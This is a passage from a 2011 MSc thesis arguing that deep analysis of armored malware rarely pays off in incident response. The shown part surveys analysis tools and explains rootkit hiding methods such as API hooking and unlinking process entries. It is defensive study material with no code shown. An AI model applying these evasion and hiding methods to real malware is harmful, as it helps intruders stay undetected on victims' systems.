Upload
vuonglien
View
228
Download
0
Embed Size (px)
Citation preview
Malware Armoring: The case against incident related binary analysis
Author Name: Steve Hendrikse
Date: February 2011
Supervisor: John Austen
Registration Number (SRN): 060352033
2
Submitted as part of the requirements for the award of the MSc in Information Security of the University
of London
Table of Contents
List of Figures ................................................................................................................................................ 4
1. Executive Summary .............................................................................................................................. 8
2. Introduction ......................................................................................................................................... 9
3. Incident Response .............................................................................................................................. 10
3.1. Introduction ............................................................................................................................... 10
3.2. Preparation ................................................................................................................................ 11
3.3. Identification ............................................................................................................................. 16
3.4. Containment .............................................................................................................................. 22
3.5. Eradication ................................................................................................................................. 28
3.6. Recovery .................................................................................................................................... 29
3.7. Lessons Learned ........................................................................................................................ 29
3.8. Conclusion ................................................................................................................................. 30
4. Armoring Techniques ......................................................................................................................... 30
4.1. Introduction ............................................................................................................................... 30
4.2. Encoding .................................................................................................................................... 32
4.2.1. String Encoding .......................................................................................................................... 32
4.2.2. Payload Encoding (Encryption) .................................................................................................. 33
4.2.3. Executable packing .................................................................................................................... 35
4.3. Virtual Machine Environment (VME) Detection ........................................................................ 39
4.4. Run-time decryption .................................................................................................................. 42
4.5. Polymorphism and Metamorphism ........................................................................................... 45
4.6. Anti-Debugging .......................................................................................................................... 48
4.6.1. API Based Detection .................................................................................................................. 49
4.6.2. Process and Thread Block Detection ......................................................................................... 49
4.6.3. Hardware and Register Based Detection................................................................................... 50
4.6.4. Exception Based Detection ........................................................................................................ 52
4.6.5. Timing Based Detection ............................................................................................................. 53
3
4.6.6. Modified Code Based Detection ................................................................................................ 54
4.7. Multi-partite .............................................................................................................................. 54
4.8. Conclusions ................................................................................................................................ 56
5. Case Study .......................................................................................................................................... 56
5.1. Introduction ............................................................................................................................... 56
5.2. Preparation ................................................................................................................................ 57
5.3. Identification ............................................................................................................................. 57
5.4. Containment .............................................................................................................................. 57
5.5. Eradication ................................................................................................................................. 66
5.6. Recovery .................................................................................................................................... 66
5.7. Lessons Learned ........................................................................................................................ 67
5.8. Conclusions ................................................................................................................................ 67
6. Conclusions ........................................................................................................................................ 68
7. Bibliography ....................................................................................................................................... 70
Appendix A – Glossary ................................................................................................................................ 77
Appendix B – Case study findings ............................................................................................................... 78
From investigation of malware that is known not to be armored ......................................................... 78
From investigation of malware that is known not to be armored ......................................................... 95
Appendix C – Case study Rootkit source code .......................................................................................... 131
Appendix D – Creation of infection ShellCode .......................................................................................... 133
4
List of Figures
Figure 1 - Function Hooking (Scambray & McClure, 2008) ......................................................................... 19
Figure 2 - Process Hiding (Scambray & McClure, 2008) .............................................................................. 20
Figure 3 - Registry (Scambray & McClure, 2008) ........................................................................................ 20
Figure 4 - NTFS Layout (SANS, 2006) ........................................................................................................... 22
Figure 5 - 3 Interconnected Phases of Analysis (Zeltser, 2010) .................................................................. 23
Figure 6 - Behavioural Analysis (Aquilina, Casey, & Malin, 2008) ............................................................... 24
Figure 7 - Binary and Code Analysis (Aquilina, Casey, & Malin, 2008) ....................................................... 25
Figure 8 - Memory Analysis (Aquilina, Casey, & Malin, 2008) .................................................................... 27
Figure 9 - String encoding/replacement ..................................................................................................... 33
Figure 10 - Payload Encoding ...................................................................................................................... 34
Figure 11 - PE File Layout (Pietrek, 1994) ................................................................................................... 35
Figure 12 - IMAGE_OPTIONAL_HEADER (Websense) ................................................................................. 36
Figure 13 - IMAGE_SECTION_HEADER (Websense) .................................................................................... 37
Figure 14 - Redpill VME detection routine (Rutkowska, 2004) ................................................................... 40
Figure 15 - LDTR, GDT based VME detection (Klein, 2010) ......................................................................... 40
Figure 16 - Packer and Cypter Comparison (Aquilina, Casey, & Malin, 2008) ............................................ 43
Figure 17 - Runtime Decryption - Executable View (Oreans Technologies, 2008) .................................... 43
Figure 18 - Crypter with armoring options (xinfiltrate) .............................................................................. 44
Figure 19 - Anatomy of Metamorphic Engine (Walenstein, Mathur, Chouchane, & Lakhoti, 2007) ......... 45
Figure 20 - Insertion of garbage instructions (Al Daoud, Jebril, & Zaqaibeh, 2008) ................................... 46
Figure 21 - Common Garbage (or junk) Instructions (Orr, 2006) ................................................................ 46
Figure 22 - Breakdown of Metamorphic Malware (Driller, 2002) (Hosmer, 2008) .................................... 47
Figure 23 - isDebuggerPresent API use (Veracode, 2008) .......................................................................... 49
Figure 24 - Query PEB directly (Veracode, 2008) ........................................................................................ 50
5
Figure 25 - Using Stack Segment to protect TRAP Flag (Falliere, 2007) ...................................................... 51
Figure 26 - Checking for use of Debug Registers (Veracode, 2008) ............................................................ 51
Figure 27 - Chaining of Handlers (Jackson, 2008) (Bania) ........................................................................... 52
Figure 28 - Use of Exception Handling to identify debugger (Veracode, 2008) ......................................... 53
Figure 29 - – Use of Timing sequence to identify debugger (Veracode, 2008) (Bania) .............................. 54
Figure 30 - Identification of offending file .................................................................................................. 58
Figure 31 - Using a system delta tool .......................................................................................................... 58
Figure 32 - Using SysAnalyzer to analyze the malware............................................................................... 59
Figure 33 – Exploit findings from Sysanalyzer ............................................................................................ 59
Figure 34 - View of strings within the malware .......................................................................................... 60
Figure 35 – Human readable output from network packet capture .......................................................... 61
Figure 36 – View of disassembled code and execution tree ...................................................................... 62
Figure 37 – Error message resulting from load into debugger ................................................................... 63
Figure 38 - Process terminated once in debugger ...................................................................................... 63
Figure 39 – View of strings within the in-memory process ........................................................................ 63
Figure 40 – Overlaid view of malware traffic (ASCII printable and TCP stream reassembled) ................... 64
Figure 41 – View of keylogger.dat contents ............................................................................................... 64
Figure 42 - Finding OEP using Ollydump ..................................................................................................... 65
Figure 43 - Reconstructing an IAT without OEP .......................................................................................... 65
Figure 44 – Full output of Inctrl5 ................................................................................................................ 79
Figure 45 – Full output of SysAnalyzer ........................................................................................................ 87
Figure 46 – Full output of ngrep session ..................................................................................................... 94
Figure 47 – Full output of Inctrl5 ................................................................................................................ 97
Figure 48 – Full output of SysAnalyzer ...................................................................................................... 102
Figure 49 – Full output of Volatility analysis ............................................................................................. 130
6
Figure 50 – main.c ..................................................................................................................................... 131
Figure 51 – install_as_persistent.c ............................................................................................................ 131
Figure 52 – version.c ................................................................................................................................. 131
Figure 53 – systeminfo.c ........................................................................................................................... 131
Figure 54 – create_sock.c ......................................................................................................................... 131
Figure 55 – download.c ............................................................................................................................. 131
Figure 56 – getnick.c ................................................................................................................................. 131
Figure 57 – http_readline.c ....................................................................................................................... 131
Figure 58 – randfilename.c ....................................................................................................................... 131
Figure 59 – getRandomPIN.c..................................................................................................................... 131
Figure 60 – encoding.c .............................................................................................................................. 131
Figure 61 – debuggerdetect.c ................................................................................................................... 131
Figure 62 – killprocess.c ............................................................................................................................ 131
Figure 63 – listprocesses.c ........................................................................................................................ 131
Figure 64 – keylogger.c ............................................................................................................................. 131
Figure 65 – keylogcontrol.c ....................................................................................................................... 131
Figure 66 – uploadkeylog.c ....................................................................................................................... 131
Figure 67 – update.c ................................................................................................................................. 132
Figure 68 – scanhost.c ............................................................................................................................... 132
Figure 69 – sleep.c .................................................................................................................................... 132
Figure 70 – vmdetect.c.............................................................................................................................. 132
Figure 71 – ms03_026.c ............................................................................................................................ 132
Figure 72 – ms04_011.c ............................................................................................................................ 132
Figure 73 – main.h .................................................................................................................................... 132
Figure 74 – version.h ................................................................................................................................. 132
7
Figure 75 – textstrings.h ........................................................................................................................... 132
8
1. Executive Summary
Given the ever-increasing complexity of malware due to armoring techniques, many commercial
enterprises should carefully consider whether comprehensive analysis of discovered malware is worth
the effort required to uncover actionable findings. While two of the most important steps in the
incident response process for malware are to (1) understand the breadth of an attack and (2) the impact
of the attack, this report will show how the advances in malware armoring have introduced features
that actively detract the analyst away from deciphering the true nature and intent of the malware.
Armoring techniques are a group of custom developed software modules that are implemented solely
for the purpose of hiding malware capabilities and thwarting analysis by the authorities. Effective
incident response should rather focus on early detection and identification of threats, with a secondary
focus on being able to respond quickly with some automated containment and eradication method
(typically a vendor supplied cleaning tool). This change in focus will ensure that the impact of a
successful infection is minimized and that the likelihood of an unidentified infection is reduced.
This paper describes the phases, tools, and procedures that make up a typical incident response plan.
To start, details about the steps of that make up current malware analysis processes will be given. Next,
armoring techniques used by the malware writers to thwart this analysis will be covered, followed by a
case study designed to demonstrate the effectiveness of current analysis techniques given the armoring
tactics in use today. Throughout this paper, special attention will be given to identify alternative
strategies that could be used by the malware analyst in the ongoing fight against malware.
9
2. Introduction
Given the ever-increasing complexity of malware due to armoring techniques, most commercial
enterprises should carefully consider whether or not to undertake comprehensive analysis of a malware
sample collected as part of a security incident. While an important step in the incident response process
is to understand the breadth of an intrusion and its impact to the organization, this report will show how
the advances in malware armoring have made it virtually impossible to decipher the true nature and
intent of the malware; and that effective incident response should focus on 1) early detection and
identification of threats and then 2) timely and effective response with some automated eradication
method (typically an vendor supplied cleaning script).
This report will walk through the incident response process, outlining the milestones and phases
involved in the process. Included in the discussion of the phases of the incident response process will be
a detailed look at an "industry best practice" response for incidents of type malware infection or
infestation. The processes, procedures, and tools that make up this “industry best practice” come from
documentation supplied by experts in the field and from experiences gained doing binary analysis of 50
randomly chosen malware samples collected from websites and low-interaction honey pots over the last
year.
A detailed examination of each of the leading armoring techniques will show how advances in armoring
reduce the chances of successful analysis. After describing the armoring technique and how it is
implemented, a discussion of the rationale and reward for using the technique will be presented. Any
advances that can be accommodated by the investigating analyst to reduce the effectiveness of the
armoring will also be presented.
Finally, this report will conclude with a case study, comparing an example of a non-armored binary to an
armored binary through the stages described in the incident response process. This case study will
demonstrate that the effort required to complete a comprehensive binary analysis of a piece of malware
simply isn't justified given the returns on the analysis. It will be shown that the greatest efforts in
responding to malware threats should be spent in strengthening the detection systems and ensuring
that the tools used in the eradication stage are effective and timely as well as covering the full breadth
of the organization’s computing landscape.
10
3. Incident Response
3.1. Introduction
Computer Security Incident Response is typically made up of a number of interconnected phases. These
phases often form a circle where the output of each phase is fed as input into the next phase and the
output of the final phase is taken as input to the first phase. The phases of the incident response
process are:
1) Preparation
2) Identification
3) Containment
4) Eradication
5) Recovery
6) Lessons Learned (SANS, 2006)
Each of the phases presented above will be discussed in the following sections, but the focus of each
section will be on covering the typical response processes, procedures, tools, and techniques in use
when dealing with a malware infection and other malicious software infestations.
The purpose for having an incident response process is to:
1) Quantify and qualify the impact of the incident
2) Effectively identify the threat for timely and complete removal
3) Identify weaker areas of control that require additional protection from the threat
landscape
The first, and, in a commercial enterprise, the most important, reason for having an active incident
response process for malware infestations is to understand the impact of the infestation. At best, a
complete listing of all the systems and data that the malware was in contacted with will allow for
identification of leaked or compromised intellectual property. This best case scenario is not often
realized, so the investigators must investigate, going from lead to lead, identifying areas that the
infestation has touched. By cross referencing the data available from the systems and the systems
impacted by the malware, conclusions can be made about the impact of the intrusion.
11
The incident response process is also responsible for accurately identifying the threat and its
propagation methods, thus allowing for quick and effective cleaning and recovery of the corporate
network. If the threat has not been accurately identified, or if the threat has taken an extended amount
of time to characterize, unnecessary damage, in the form of additional data loss or cost of remediation
effort, may be realized.
Finally, the organization must understand how the threat was able to bypass existing controls to gain a
foothold in the corporate environment. The bypass may have resulted from weak technical controls,
weak policy, or weak user awareness and training. Once these areas of weakness are identified, they
can be fed back into the incident response process as opportunities for improvement. The opportunities
for improvement may involve any of the technology controls, policy controls, or user training and
awareness.
3.2. Preparation
The first phase in any incident response process is the “Preparation” phase. This is the phase whereby
all of the needed policies, processes, tools, procedures, and templates are defined and collected into an
incident response plan.
Every commercial organization will have an information security policy statement. An information
security policy statement expresses management’s commitment to the implementation, maintenance,
and improvement of its information security management system. An information security
management system (ISMS) includes all of the policies, procedures, plans, processes, practices, roles,
responsibilities, resources, and structures that are used to protect and preserve information. It includes
all of the elements that organizations use to manage and control their information security risks
(Praxiom Research Group Ltd, 2009).
The ISMS is especially useful as it will assist in the identification of features and functionality required by
the compensating controls. The policies will also assist in defining the:
1) Assets most valuable to the organization,
2) Risk aversion of the organization, and
3) Expectations of recovery after an event or incident.
Properly defined response strategies must be defined prior to an incident being raised so that every
responder in the organization will react in an organized and consistent fashion. There can be a wide
12
variation in the response to a malware incident. If the number of infected machines is low, or if the
spread of machines is slow (in both cases thresholds will need to be defined by the organization), the
response may simply be to allow the automated identification and cleaning system (typically an Anti-
Virus solution) to control the containment and eradication. However, if the number of machines is high,
or if the number of infected machines is growing at a dramatic pace, additional effort may be placed on
the response. In either case, it is critically important to be able to identify the threat in a consistent,
accurate, and timely fashion.
These response strategies will also define the members of the response team. Depending on the
organization’s requirements for response, this team may be made up of members from the following
teams (which cross all boundaries of the organization):
1) Public Relations
2) Product Management (in terms of online ownership)
3) Human Resources
4) Legal
5) Information Security
6) Information Technology
Each of these teams will bring their individual capabilities and perspective into the proper handling of
the incident. Public Relations and Product Management will be focused on liaising with external
customer and partners of the organization under incident. It is their focus to ensure that these
important partners are aware of the incident, and have a good understanding of the measures being
taken by the organization to contain the incident. Human Resources and Legal will be focused on the
internal aspects of the organization’s response, ensuring that the organization’s best interests are
maintained with respect to its staff, its intellectual property, and any legislative action resulting from the
incident. Finally, the information security and information technology teams will be focused on
quantifying the impact of the incident and eradicating the malware from the environment, respectively.
According to the National Institute of Standards and Technology, an incident response team (or CSIRT,
computer security incident response team) services can be grouped into three categories:
1) “Reactive services. These services are triggered by an event or request, such as a report of a
compromised host, wide-spreading malicious code, software vulnerability, or something that
was identified by an intrusion detection or logging system. Reactive services are the core
component of CSIRT work.
13
2) Proactive services. These services provide assistance and information to help prepare,
protect, and secure constituent systems in anticipation of attacks, problems, or events.
Performance of these services will directly reduce the number of incidents in the future.
3) Security quality management services. These services augment existing and well established
services that are independent of incident handling and traditionally performed by other areas of
an organization such as the IT, audit, or training departments. If the CSIRT performs or assists
with these services, the CSIRT’s point of view and expertise can provide insight to help improve
the overall security of the organization and identify risks, threats, and system weaknesses. These
services are generally proactive but contribute indirectly to reducing the number of incidents”.
(West-Brown, Stikvoort, Kossakowski, Killcrece, Ruefle, & Zajicek, 2003)
When dealing with malware infections, the reactive services category is the category that becomes the
most prevalent, capitalizing on the time and resources of the response teams. The following tasks take
up the majority of time and effort when responding to a malware incident as they relate most closely to
understanding the impact of the attack and how to eradicate the malware from the environment:
1) “Forensic evidence collection: the collection, preservation, documentation, and analysis of
evidence from a compromised computer system to determine changes to the system and to
assist in the reconstruction of events leading to the compromise. This gathering of information
and evidence must be done in a way that documents a provable chain of custody that is
admissible in a court of law under the rules of evidence. Tasks involved in forensic evidence
collection include (but are not limited to) making a bit-image copy of the affected system’s hard
drive; checking for changes to the system such as new programs, files, services, and users;
looking at running processes and open ports; and checking for Trojan horse programs and
toolkits. CSIRT staff performing this function may also have to be prepared to act as expert
witnesses in court proceedings.
2) Tracking or tracing: the tracing of the origins of an intruder or identifying systems to which the
intruder had access. This activity might involve tracking or tracing how the intruder entered the
affected systems and related networks, which systems were used to gain access, where the
attack originated, and what other systems and networks were used as part of the attack. It
might also involve trying to determine the identity of the intruder. This work might be done
alone but usually involves working with law enforcement personnel, Internet service providers,
or other involved organizations.” (West-Brown, Stikvoort, Kossakowski, Killcrece, Ruefle, &
Zajicek, 2003)
14
The processes and procedures required for effective response and analysis of malware executables
should be developed and tested prior to an actual incident. In this way, the analysts have experience
using the tools and can recognize valid or expected outputs from the tools. The actual procedures used
in the analysis of an unknown executable are covered in detail in the containment section (Section 3.4).
The tools required for malware analysis can be classified into 4 families. The families are:
1) file identification and manipulation tools,
2) system delta tools,
3) system activity monitoring tools, and
4) file deconstruction tools.
The first family of tools, file identification and manipulation tools are used to identify the malicious
executable and extract any quick wins in the analysis process. To begin, Openports (Diamond Computer
Systems Pty., 2005), and other similar tools, will assist in identifying which file on the disk is connected
to which process running in memory. It is often straightforward to identify which computer in an
enterprise network is transacting inappropriate network communication, but refining the search down
to a file on disk can be challenging. Once the malicious file is identified, a tool like strings (Russinovich,
Strings v2.41, 2009) will extract all of the ASCII strings found within the suspected file. These strings are
often helpful during the process of analyzing the malicious file as these strings may identify Command
and Control (C&C) commands, destination IP addresses, C&C credentials, or error messages embedded
within functions inside the malware file. With increasing regularity though, malicious file authors are
obfuscating their executables using packing functions. The details of executable packing are covered in
the armoring section of the report (Section 4.2.3), but one of the result of packing is the obfuscation of
ASCII strings. Tools like PEid (Jibz, Qwerton, snaker, & xineohP, 2007) will analyze the structure of the
malicious file and report back on the packing method used (if previously defined) and the file section
details. Finally, tools like PE.explorer (HeavenTools Software, 2011), can dissect an executable file and
identify embedded resources, required libraries, and other system specific hints that will aid in the
determination of the potential impact of the malware.
Once the suspected file is identified, and a number of preliminary findings are possibly observed, the
analysis will likely change tactics and attempt to run the malware in a controlled environment that is
equipped with a number of monitoring systems. A primary goal of this phase of the investigation is to
understand how the victim computer is changed by the infection. System delta tools, like Inctrl5 (PC
15
Magazine, 2000) or Sysanalyzer (iDefense Labs, 2011) will build a baseline of the current system settings
and configuration. Once the baseline is created, the suspected malware sample is executed and allowed
to run as designed. After some period of time, the delta tool is re-run and the system configuration is
once again collected. The delta tool then compares the new configuration with the original baseline
collected prior to the execution of the malware. Assuming that the analyst did not allow any other
system updates to occur during the infection process, all changes to the system configuration will have
been made by the malicious executable. The information gathered with the use of this tool will be
added to the information collected by the file identification tools to continue to add detail and context
to the scenario being built by the analysis process.
In addition to understanding how the system configuration has changed due to the infection of the
computer by the malware, the analyst will also want to understand how the malicious process, started
by the malicious file, is interacting with the local computer as well as the networked systems that are
connected to the infected computer. Tools like Regmon, Filemon, and Procmon (Russinovich,
Sysinternals Suite, 2011) monitor and report on current activity in the Registry, file system, and running
process table, respectively. Windump (Cace Technologies, 2006), ngrep (Ritter, 2006), and others like
them monitor and display networked destinations and the traffic between them. Lastly, tools like
SpyStudio (Nektra Advanced Computing, 2009) and DDESpy (Microsoft, 2010) monitor calls being made
to the foundational Windows libraries and display the library and function name as the function is being
called from within the malicious executable.
Typically, the behavioural analysis completed to this point has been accomplished using systems that
have been virtualized in some Virtual Machine Environment (VME), like VMware (VMware Inc, 2011),
VirtualPC (Microsoft, 2011), or Xen (Xen.org, 2011). These virtualized environments allow for simple
isolation of machines, quick return to known configurations (using image and memory snapshots), and
the ability to connect monitoring software to internal aspects of the system. However, malware authors
have recognized that analysis takes place in virtualized environments, and have developed armoring
techniques to counteract virtual machine technology (Section 4.3). In this way, even after the malicious
executable has been identified or observed, including how the executable interacts with the infected
computers and others connected to it, it is often necessary to decompose the executable into a set of
human readable instructions to gain the required level of understanding of the potential impacts of the
infection. Assuming the executable has been packed by some known packer, a comprehensive
unPacker, like GUNpacker ([email protected], 2010), can be used to return the packed
16
executable into a form that can be decomposed into the required set of human readable instructions.
Again, with increasing regularity, malicious executables are packed using proprietary algorithms, or
packed using an encryption algorithm. In these cases, the generic unPacker will fail. As an alternative, a
debugging tool like Ollydbg (Yuschuk, 2010) (and complimentary scripts like Ollydump (Gigapede, 2011))
can be used to pull the executable out of memory. However, due to the in-memory organization of
Portable Executable (PE) based processes, additional tools like LordPE (y0da, 2009) and ImpREC (MackT,
2008) are required to rebuild the dumped memory into a working executable file. In some cases
advanced tools like Nigilant32 (Agile Risk Management LLC, 2011) or Volatility (Volatile Systems, LLC ,
2008) will be required to dump the entire contents of memory to a file, and then extract the process
image from the dump. Once the executable has been reconstructed, a disassembler, such as IDA Pro
(Hex-Rays SA , 2011) can be used to complete the analysis of the executable.
Mastery, even proficiency, of all the tools in each of these families can take a significant investment in
time and energy. For this reason each tool should be properly documented, its use case and expected
outcomes should be clearly known in order to reduce both false findings or missed evidence. A false
finding may lead the analyst to pursue a line of examination that has no bearing on the actual impact of
the malware. This incorrect line of examination also may lead the examiner to miss certain key pieces of
evidence that might fully expose the true nature and intent of the malicious file. It is considered best
practice to duplicate the findings of a step in the analysis with another tool known to produce similar
outcomes, and to document the procedures and findings to allow an alternate examiner to reproduce
any findings that are discovered by the primary examiner.
The required security policies are created in this phase, but in order for the security policies to be
enforced, and for the incident response team’s ability to monitor for these breaches in the policies, all of
the compensating controls ought to have a component of monitoring built in. It is with the ability to
detect these breaches that the organization can move to the next phase of the process.
3.3. Identification
Once all of the policies are written, compensating controls implemented, and the staff is trained, the
next phase of the incident response process begins. The goal of the identification phase is to gather
events, analyze them, and determine whether we have an incident (SANS, 2006). According to the SANS
Institute, identification can occur at 3 levels: network perimeter, host perimeter (host networking, host
firewall, HIPS), and system level (A/V, file integrity, etc) (SANS, 2006). Events identified at the furthest
17
edge of the network have the best hope of being stopped prior to any damage being done as events are
still far away from the core of the network (where the most sensitive of data is stored). However,
following the “Defense in Depth” (Perrin, 2008) mantra, the goal of monitoring is to identify the event at
each of the 3 levels.
As discussed in the Preparation phase, there are many technologies available to assist in the
identification of a malware infection. Some examples of technologies that can be used to identify a host
based malware infection include:
1. Network Intrusion Detection System
2. Network Flow and Anomaly Detection
3. Network Content Filtering and Scanning (e.g. mail-flow scanning)
4. Network Firewall logs (blocked packets to malicious websites)
5. Host Intrusion Prevention System
6. Host Anti-Virus logs
Network Intrusion Detection Systems (IDS) are systems that are placed on the network, in promiscuous
mode, in order to read all network packets, regardless of the packet’s destination. Once a packet is
read, the IDS will compare the collected packet to the set of known malicious data signatures that have
been previously defined. If a match between the read traffic and stored signature is found, an alert is
raised.
Similar to IDS, Network Flow and Anomaly Detection (NetFlow) systems sit on the network, also in
promiscuous mode, and capture all network traffic. Unlike IDS systems where the captured traffic is
compared to a set of previously defined signatures, the NetFlow system builds a model of normal traffic
patterns over time. After the traffic model is built, and has had sufficient time to build some level of
confidence in the accuracy of the model, the Anomaly system compares the current traffic to the model.
Should the current traffic differ greatly from the traffic mode, an alert is raised.
Network Content Filtering is again similar to IDS, but relies on matching application level, typically World
Wide Web (WWW), traffic. As well, where WWW traffic is concerned, the Network Content Filtering
engine categorizes any WWW destinations into named categories that are either allowed or blocked,
based on the policy implemented in the device by the organization.
18
A perimeter firewall acts like a traffic director, allowing some traffic to pass and blocking other traffic.
Typically, a “white- list” style of access is implemented whereby only known good traffic is allowed to
enter or exit the perimeter of the network. With each allow or block, an audit log entry is created
containing a timestamp, origin address and port, destination address and port, and action taken.
Host-based Intrusion Detection Systems (HIDS) and Anti-Virus Systems (AV) are both installed on the
local systems and often serve as the last line of defense against malware threats. The HIDS incorporates
a combination of network based signatures and program execution signatures that are compared to the
current activity on the system. If a match is encountered, an alert is raised and the activity is blocked.
Similarly, if a previously defined AV signature is matched by either a process or file on the protected
computer, an alert is raised and some response action is taken (clean, quarantine, block).
All of the technologies described above contribute to the capability to quickly and accurately identify a
networked host that appears to be infected by some malicious software. In many cases, there will be
multiple, simultaneous alerts created for an infected host. These multiple alerts increase the likelihood
of a true positive, while reducing the likelihood of a false positive. Due to the potential damage that
could result, every event, regardless of how many simultaneous alerts are identified, should be
responded to in order to reduce the chance of a missed true positive reading.
Once a suspicious host has been identified, the search for the malicious executable begins. In order to
locate the malicious file, the following types of tools, from the family of “system activity monitoring
tools” should be used on the suspicious host:
1) Those that identify inconsistencies between high level (API) calls and low level (direct) calls
2) Those that identify processes in “run”able state that aren’t shown in the task list
3) Those that identify registry anomalies or inconsistencies
4) Those that identify hidden (both allocated and not) sections of disk
5) Those that identify non-standard network port use or activity
Malicious executables often will try to evade detection by inserting small stub routines into the running
system that allow evidence of malicious activity to be hidden. These stub routines work by changing API
results so that a system view using an API is different than from the actual view in storage (Microsoft,
2006). The process of inserting these small stub programs that intercept legitimate calls is known as
hooking, and is depicted in Figure 1. In Figure 1, process.exe expects
19
IMPORTED.DLL!ImportedLibraryFunction1() to reach ImportedLibraryFunction1() within IMPORTED.DLL
without having to pass through ROOTKIT.DLL first.
Figure 1 - Function Hooking (Scambray & McClure, 2008)
A tool like RootKitRevealer can identify these inconsistencies because it compares the results of a
system scan at the highest level with that at the lowest level. The highest level is the Windows API and
the lowest level is the raw contents of a file system volume or Registry hive (a hive file is the Registry's
on-disk storage format). (Microsoft, 2006) Thus, this tool can identify systems that have been
compromised and aid in the determination of the origin of the infection.
In User-mode, processes in Windows are backed by a kernel-mode object known as executive process
(EPROCESS) blocks. This EPROCESS block is a memory based structure that contains information about
each running process. These EPROCESS blocks are connected in a doubly linked list; with each
EPROCESS block having a pointer to the next and previous EPROCESS block (Scambray & McClure, 2008).
For most Windows utilities (especially TaskMgr), this doubly linked list of EPROCESS blocks is the source
for process information. However, the Windows Scheduler does not use this list for the actual
scheduling of CPU cycle time. Thus, as shown in Figure 2, an EPROCESS block can be orphaned (the links
of the previous and next EPROCESS blocks updated to bypass current EPROCESS block) and still remain
running on the CPU. This mechanism of orphaning EPROCESS blocks enables a piece of malicious code
to continue running on a computer while not showing up in the task list. Checking for inappropriate or
out-of-place processes by consulting the task list is one of the primary steps in the malware incident
response step.
20
Figure 2 - Process Hiding (Scambray & McClure, 2008)
In Windows based operating systems, the Registry is one of the key locations for storing configuration
and system information. Due to the complexity of most Windows installations, and Microsoft’s desire to
maintain backward compatibility from previous version of Windows, the Registry can easily hide settings
introduced by malicious software. As shown in Figure 3, there are tools available that assist in analyzing
and identifying potentially undesired settings within the Registry.
Figure 3 - Registry (Scambray & McClure, 2008)
In addition to being able to surreptitiously store information in the Registry, the NTFS file system can
also be used to hide information. Modern malware will hide itself in any or all of:
1) The Windows system subdirectories
21
2) The Boot Sector
3) File Slack Space
4) Unallocated Space
5) Host Protected Area
Modern versions of Windows are made up of hundreds of files, with many different types of
extensions. These files are regularly updated and replaced when a service pack or patch is applied.
Experience has shown that a well-crafted file name, made similar to a legitimate Windows file name,
will escape detection for a considerably long time. Detection will only occur after an A/V signature
has been created that either matches on the file hash or a sequence of bytes within the malicious
file itself.
As shown in Figure 4, the system disk in a Windows system is divided into a number of equally
chunks, called sectors. The boot sector is the area of disk that holds the code that boot straps the
computer with the initial libraries to get Windows up and running. Files, including those that make
up the Windows Operating System are stored within the disk sectors following the boot sector.
Each of the files takes up as many sectors as required to contain the whole file, regularly leaving
some amount of storage within the last sector available. This storage, available within the last
sector allocated to the data file is known as slack space. Malware is able to identify these unused
sections of disk and will often store information (for example key log data) in these areas. The area
of the disk that has not been formatted by the operating system for use with file storage is called
the unallocated space. Malware will often store data in this area as well, typically starting at the end
of the disk and working toward the front of the disk, in an effort to maintain the storage as long as
possible.
22
Figure 4 - NTFS Layout (SANS, 2006)
The last type of tool required for the identification and analysis of malware are those that are able to
observe, intercept, or manipulate network communications. Once atypical or malicious/unwanted
network communication has been identified, these network analysis tools will be used to identify the in-
memory process that is driving the communication. Once the in- memory process is known the
executable file on disk can be identified and extracted.
At this point in the identification phase, a clear and present threat has been identified and is in the form
of some unauthorized process that was started by a file stored on a storage medium attached to one (or
more) of the organizations computers.
3.4. Containment
With the confirmed identification of an executable file spawning a malicious process on the computer,
the incident response process moves into the Containment phase. The primary goal of this phase is to
keep the problem from getting worse (SANS, 2006) . In the commercial enterprise, this goal is likely to
be realized as the collection and delivery of a specimen copy of the malicious executable file to the
business partner responsible for creating an A/V signature. This will allow the partner with specialist
knowledge of characterizing and cleaning malware samples to deliver a signature for use in widespread
detection and automated response (either by cleaning or quarantining). Once the specimen has been
sent to the A/V partner, short term containment efforts will be undertaken, which may include installing
a network ACL to disallow any in- or out- bound network traffic from the host, the blocking of certain
executables, or disconnection of infected machines from the corporate network. In order to preserve
evidence, adding an “all traffic block” ACL on the network port of the infected machine is most effective.
23
This response ensures that the system state is not altered, and that any memory resident data is left
intact.
In a comprehensive analysis of an unknown binary, there are 3 interrelated phases: behavioural, binary
and code, and memory (Zeltser, 3 Phases of Malware Analysis: Behavioral, Code, and Memory Forensics,
2010). The analysis of a particular malware specimen can start at any of the 3 phases, but typically it
starts at the behavioural phase. The behavioural phase requires the least amount of specialist computer
skill as this phase deals primarily with observing the malware in action. However, as depicted in Figure
5, the analysis doesn’t normally progress serially from one to another, rather, each of the three stages
are completed in a lock step fashion, where steps of each phase will provide useful data and context to
the other phases.
Figure 5 - 3 Interconnected Phases of Analysis (Zeltser, 2010)
24
In the behavioural analysis process, a common approach is to bring up a virtual image of a clean
operating system install via one of the available Virtual Machine Environments (VME). This phase of the
analysis process is depicted in Figure 6. The goal of this phase of the analysis is to discover how the
suspected malware interacts with the network, file system, and system state resources of the infected
Figure 6 - Behavioural Analysis (Aquilina, Casey, & Malin, 2008)
25
computer. The analyst observes and documents the various aspects of the malware’s interaction with
the system, hoping to understand the underlying goal of the malware. Each observed fact is recorded
and used in the other phases to identify additional pieces of information about the malware. In addition
to using the gained data for the other phases, this data is used to develop customized routines
for network- and host- based
monitoring systems, host-
based cleaning routines, and
perimeter network controls.
The Binary and Code Analysis
phase, shown in Figure 7,
concerns itself with the binary
file and aspects of the program
that are made known via
deconstruction of the
executable file itself. The first
step of this analysis is to
determine if the file has been
packed or encrypted by some
known algorithm. If the file
has not been packed,
extraction of ASCII strings is
the best first step. Often C&C
commands, username/
password pairs, and control
server IP addresses can quickly
be extracted. Following these
string extractions, identifying
the libraries and other
dependencies will add context
and richness to the picture
being developed of the
Figure 7 - Binary and Code Analysis (Aquilina, Casey, & Malin, 2008)
26
malware’s capabilities. Finally, the file can be opened in a disassembler like IDApro to trace through all
of the steps of the executable. Using a disassembler allows the analyst to peer into every capability
stored within the binary file but requires considerable investments in time and technical capability of
the analyst.
With increasing regularity, malicious files are armored using techniques described in Section 4, which
inhibit the analyst’s ability to extract meaningful impact or damage evidence from the running
executable within the virtual environment. Armoring also inhibits extracting any data from the file itself
or disassembling the file. In these cases, the third and final aspect of binary analysis must be done,
memory analysis (Figure 8).
Memory analysis starts by opening the malicious executable inside of a debugger program. Once
loaded into the debugger, the analyst can step into, or over, every instruction. This fine-grained control
allows the analyst to bypass sections of code that might normally impact the analyst’s ability to
complete the analysis. However, this manual stepping through the executable is time consuming. As a
compromise between the control of single stepping through the program and the time required to step
through the entire application, breakpoints can be applied which allow the program to run without
